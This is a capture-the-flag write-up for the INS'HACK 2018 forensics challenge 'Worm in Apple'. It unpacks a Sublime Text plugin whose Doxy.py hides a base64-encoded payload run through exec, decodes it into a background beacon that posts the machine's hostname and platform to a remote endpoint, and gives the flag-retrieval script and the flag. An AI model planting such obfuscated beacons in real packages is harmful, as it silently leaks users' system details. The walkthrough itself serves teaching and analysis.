Writeup: INS'HACK 2018 - Worm in Apple

(Updated: )
writeups
, , ,

Information

  • Category: forensics

Description

A guy I met on the Internet wanted me to test its new ST3 plugin.

I have a bad feeling about this…

Maybe you can tell me if I’m right to be worried?

Investigate as far as you can.

challenge file

Writeup

The challenge was pretty simple but neat.

First of all we need extract all files from the package:

unzip DoxyDoxygen.sublime-package

Lots of file will pop-up but the interesting one is Doxy.py which contains:

1
2
3
4
try:
    import base64;A=b'IyAgICAgICAvIVwgRk9SIEVEVUNBVElPTkFMIFBVUlBPU0UgT05MWSAvIVwKQT0nNy4yemJ2LWJuMDB5cmNwNHNjdi0zcnA1MnY0OWJ2LTNuY3MyJwpCPTQ0MwpDPScwMTIzNDU2Nzg5YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXotLicKaW1wb3J0IHRpbWU7aW1wb3J0IHJlcXVlc3RzO2ltcG9ydCBwbGF0Zm9ybTtmcm9tIHV1aWQgaW1wb3J0IHV1aWQ0O2Zyb20gdGhyZWFkaW5nIGltcG9ydCBUaHJlYWQKZGVmIHcoKToKICAgIGksdT1zdHIodXVpZDQoKSksJ2h0dHBzOi8ve306e30ve30nLmZvcm1hdCgnJy5qb2luKFtDWyhDLmluZGV4KGUpLTB4MGQpJWxlbihDKV0gZm9yIGUgaW4gQV0pLEIsJycuam9pbihbY2hyKGVeMHg0MikgZm9yIGUgaW4gWzQ0LDQ1LDU0LDQzLDM2LDU5XV0pKQogICAgd2hpbGUgVHJ1ZTpyZXF1ZXN0cy5wb3N0KHUsanNvbj17J3V1aWQnOmksJ25vZGUnOnBsYXRmb3JtLm5vZGUoKSwncGxhdGZvcm0nOnBsYXRmb3JtLnBsYXRmb3JtKCl9KTt0aW1lLnNsZWVwKDUpCnQ9VGhyZWFkKHRhcmdldD13KQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOnQuc3RhcnQoKTt0LmpvaW4oKQplbHNlOnQuZGFlbW9uPVRydWU7dC5zdGFydCgpCg==';exec(base64.b64decode(A));
except:
    pass

Decoding the payload leads us to:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#       /!\ FOR EDUCATIONAL PURPOSE ONLY /!\
A = '7.2zbv-bn00yrcp4scv-3rp52v49bv-3ncs2'
B = 443
C = '0123456789abcdefghijklmnopqrstuvwxyz-.'
import time
import requests
import platform
from uuid import uuid4
from threading import Thread


def w():
    i, u = str(uuid4()), 'https://{}:{}/{}'.format(''.join([
        C[(C.index(e) - 0x0d) % len(C)] for e in A
    ]), B, ''.join([chr(e ^ 0x42) for e in [44, 45, 54, 43, 36, 59]]))
    while True:
        requests.post(
            u,
            json={
                'uuid': i,
                'node': platform.node(),
                'platform': platform.platform()
            })
        time.sleep(5)


t = Thread(target=w)
if __name__ == '__main__':
    t.start()
    t.join()
else:
    t.daemon = True
    t.start()

The code will POST to https://worm-in-apple.ctf.insecurity-insa.fr:443/notify our machine generated uuid, hostname and kernel version.

Why not just open the URL in browser?

The root https://worm-in-apple.ctf.insecurity-insa.fr/ reveals a nice ASCII art:

but the interesting part is in the source code:

1
2
3
4
5
6
7
<!-- [yo! dev! remove me! or not...]
    LyAgICAgICAgLT4geW91J3JlIGxvb2tpbicgYXQgaXQKICAgICAgICAgICAgL25vd
    GlmeSAgLT4gdGhlIGJlYWNvbiBlbmRwb2ludAogICAgICAgICAgICAvZmxhZyAgIC
    AtPiB0aGUgZmxhZyBlbnBvaW50Li4uIGJ1dCBkb24ndCBnZXQgdG8gY29ja3kgdGh
    lcmUKICAgICAgICAgICAgICAgICAgICAgICAgYXJlIHNvbWUgcmVxdWlyZW1lbnRz
    Lg==
-->

that states:

1
2
3
4
/        -> you're lookin' at it
            /notify  -> the beacon endpoint
            /flag    -> the flag enpoint... but don't get to cocky there
                        are some requirements.%

Opening the url https://worm-in-apple.ctf.insecurity-insa.fr/flag?uuid=f32a17aa-6063-48ab-9ed8-aa95c71800e1 is a dead end:

1
your cookie missing or maybe you don't know what HMAC means :(

Probably the backend service use victim uuid to generate a cookie using HMAC.

So why not use the original script to see if on /notify a cookie is set and try to get the flag?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#       /!\ FOR EDUCATIONAL PURPOSE ONLY /!\
A = '7.2zbv-bn00yrcp4scv-3rp52v49bv-3ncs2'
B = 443
C = '0123456789abcdefghijklmnopqrstuvwxyz-.'
import requests
from uuid import uuid4


def w():
    i, u = str(uuid4()), 'https://{}:{}/{}'.format(''.join([
        C[(C.index(e) - 0x0d) % len(C)] for e in A
    ]), B, ''.join([chr(e ^ 0x42) for e in [44, 45, 54, 43, 36, 59]]))
    session = requests.Session()
    r = session.post(
        u,
        json={
            'uuid': i,
            'node': "givemeflag",
            'platform': "sameasabove"
        })
    print(r.cookies)
    r = session.get(u.replace("notify", "flag"), params={'uuid': i})
    print(r.url)
    print(r.text)


w()

Running the above snippet will get us the flag!

1
2
3
<RequestsCookieJar[<Cookie uuid="2|1:0|10:1523093557|4:uuid|68:NWU5YmM0NjItZGEwOC00NTI5LTgyMzQtNjUzYWEzZmMxY2I1WzEwLjQyLjgxLjU3XQ==|9b3c23650e9ed9233c67b4ef572cf8ec9634f282b2a8263624b9a562bd428f94" for worm-in-apple.ctf.insecurity-insa.fr/>]>
https://worm-in-apple.ctf.insecurity-insa.fr:443/flag?uuid=5e9bc462-da08-4529-8234-653aa3fc1cb5
here is your reward my dear: INSA{30880b4d7e6726f5614eb57d0c6d9e7aa23e9cbbae89a6c91aebb9d0352bc53b}

Flag

INSA{30880b4d7e6726f5614eb57d0c6d9e7aa23e9cbbae89a6c91aebb9d0352bc53b}